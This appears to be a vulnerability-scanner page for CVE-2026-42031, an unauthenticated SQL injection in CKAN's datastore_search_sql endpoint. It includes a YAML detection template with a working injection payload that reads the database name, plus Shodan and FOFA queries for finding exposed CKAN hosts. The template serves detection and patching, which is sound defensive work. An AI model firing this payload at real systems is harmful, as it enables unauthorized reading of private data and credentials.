CKAN DataStore SQL Search - SQL Injection
CVE-2026-42031
Verified
Description
CKAN, an open-source data management system used for powering open data portals, contains an unauthenticated SQL injection vulnerability in the datastore_search_sql API endpoint.
Severity
High
CVSS Score
9.8
Exploit Probability
2%
Published Date
May 4, 2026
Template Author
theamanrawat
CVE-2026-42031.yaml
id: CVE-2026-42031
info:
name: CKAN DataStore SQL Search - SQL Injection
author: theamanrawat
severity: high
description: |
CKAN, an open-source data management system used for powering open data portals, contains an unauthenticated SQL injection vulnerability in the datastore_search_sql API endpoint.
impact: |
An unauthenticated attacker can read arbitrary data from the PostgreSQL database including system catalog tables, private DataStore resources, and potentially user credentials.
remediation: |
Upgrade CKAN to version 2.10.10 or 2.11.5 or later.
reference:
- https://github.com/advisories/GHSA-h7j7-3rx6-xvcg
- https://github.com/ckan/ckan/security/advisories/GHSA-h7j7-3rx6-xvcg
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-42031
epss-score: 0.01815
epss-percentile: 0.76082
cwe-id: CWE-89
metadata:
max-request: 2
verified: true
shodan-query: http.title:"CKAN"
fofa-query: title="CKAN"
tags: cve,cve2026,ckan,sqli,datastore,unauth
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/api/action/status_show"
matchers-condition: and
matchers:
- type: word
words:
- "ckan_version"
- '"success": true'
condition: and
internal: true
- type: status
status:
- 200
internal: true
- method: GET
path:
- "{{BaseURL}}/api/action/datastore_search_sql?sql=SELECT+ts_rewrite('a'::tsquery,+'SELECT+''a''::tsquery,+(SELECT+current_database())::tsquery')"
matchers-condition: and
matchers:
- type: word
words:
- '"success": true'
- "ts_rewrite"
- "records"
condition: and
- type: status
status:
- 200
# digest: 490a0046304402201a7de13cb01502728d4b23ea0cf99bfa76574e99ae6d8473fe20ac902d3cb87e02206b5f0a403345dda138c05dde50650d047f4b21c3897a027b1faaf6bba2d126c2:922c64590222798bb761d5b6d8e729509.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-42031
CWE ID:
cwe-89
Remediation Steps
Upgrade CKAN to version 2.10.10 or 2.11.5 or later.